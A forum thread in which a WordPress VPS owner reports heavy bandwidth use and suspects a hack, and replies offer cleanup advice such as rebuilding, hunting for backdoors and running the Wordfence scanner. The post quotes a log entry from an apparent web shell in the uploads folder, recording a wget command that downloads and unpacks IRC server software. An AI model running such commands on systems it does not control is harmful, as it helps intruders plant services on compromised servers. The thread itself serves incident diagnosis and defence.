Have I been hacked?

Hi Everyone,

I’m pretty sure my server has been hacked as it is using 500-1000gb of bandwidth a month more than normal and load average is 100+ by several /sbin/syslogd processes. I’m very new to this and have no idea what to do other than checking some basic spots.

I checked my apache logs and found repeats of this text (error.log attachment)

A bit more investigating, I found this in my wordpress log

Url : /wp-content/uploads/thumb_editor.php
Last Command : wget --no-check-certificate https://www.unrealircd.org/downloads/Unreal3.2.10.4.tar.gz; tar -xzvf Unreal3.2.10.4.tar.gz; rm Unreal$

Sounds like someone is running an irc bot or server off my vps.

Thoughts?

Probably your WP was hacked because of insecure/outdated OS, plugins or WP, theme or you used something with prefix “nulled”. Another reason could be weak passwords for ftp, ssh or WP. Either way you must find how they hacked you or only thing what is left is to pull down everything and rebuild but not using anything from old config if not its useless job.
If you just delete compromised file is not enough as there could be one or even several backdoor still active and in short time you will find yourself at the beginning. If i were you i would start with WP as usually is the one who gets hacked what would limit everything inside that specific virtual server / user.

Sorry for the late reply to this thread but I have only just seen it. The first thing I would do is install a plugin called Wordfence. Wordfence does need some configuration but the Wordfence forum on their website or on the Wordpress plugins page will help. They are both monitored by the Wordfence experts. Once configured run a scan and Wordfence will report any problems with your wordpress installation. I install Wordfence on every installation of wordpress I install and make sure my users run a scan after each update to wordpress or any plugins.